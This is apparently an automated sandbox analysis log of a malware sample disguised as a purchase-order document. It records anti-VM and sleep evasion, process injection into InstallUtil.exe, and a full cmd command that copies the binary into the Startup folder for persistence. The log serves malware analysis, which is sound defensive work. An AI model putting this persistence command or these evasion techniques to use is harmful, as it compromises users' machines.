Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: A4A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: A850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: B850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: C850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 26E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 4740000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Window / User API: threadDelayed 2234	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Window / User API: threadDelayed 7626	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Window / User API: threadDelayed 1119	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Window / User API: threadDelayed 8736	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Window / User API: threadDelayed 2493	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Window / User API: threadDelayed 7359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 1659	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 3782	Jump to behavior

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe TID: 972	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe TID: 972	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 1336	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 1336	Thread sleep time: -36000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 7000	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 7000	Thread sleep time: -36000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe TID: 7148	Thread sleep time: -34126476536362649s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe TID: 7148	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe TID: 884	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe TID: 884	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1484	Thread sleep count: 1659 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3816	Thread sleep count: 3782 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -15679732462653109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -99766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -99438s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -99219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -99109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -99000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -98890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -98781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -98657s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -98547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -98438s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -98313s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -98188s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -98063s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -97938s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -97828s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -97719s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -97594s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -97485s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -97360s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -97235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1220	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98657	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: Drawing specification and June PO #07329.exe, 00000000.00000002.2574300881.00000000063D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b})
Source: Drawing specification and June PO #07329.exe, 00000000.00000002.2572021121.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, Drawing specification and June PO #07329.exe, 00000000.00000002.2574686488.0000000006610000.00000004.08000000.00040000.00000000.sdmp, Drawing specification and June PO #07329.exe, 00000000.00000002.2566518766.0000000002EAD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.4660130188.000000000295E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000D.00000002.4062928244.0000000002AAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxTray
Source: Drawing specification and June PO #07329.exe, 00000000.00000002.2574686488.0000000006610000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: sandboxierpcssGSOFTWARE\VMware, Inc.\VMware VGAuth
Source: file.exe, 0000000C.00000002.4656912064.0000000000D66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw~
Source: Drawing specification and June PO #07329.exe, 00000000.00000002.2564164463.0000000000E62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
Source: file.exe, 0000000D.00000002.4062928244.0000000002AAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q#SOFTWARE\VMware, Inc.\VMware VGAuth
Source: file.exe, 0000000D.00000002.4062248332.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: InstallUtil.exe, 0000000E.00000002.4668693776.0000000005BB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 800000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 800000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 764008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 800000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 802000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 83C000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 83E000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 698008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1047008	Jump to behavior

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 38 > nul && copy "C:\Users\user\Desktop\Drawing specification and June PO #07329.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" && ping 127.0.0.1 -n 38 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 38 > nul && copy "c:\users\user\desktop\drawing specification and june po #07329.exe" "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\file.exe" && ping 127.0.0.1 -n 38 > nul && "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\file.exe"
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 38 > nul && copy "c:\users\user\desktop\drawing specification and june po #07329.exe" "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\file.exe" && ping 127.0.0.1 -n 38 > nul && "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\file.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Queries volume information: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

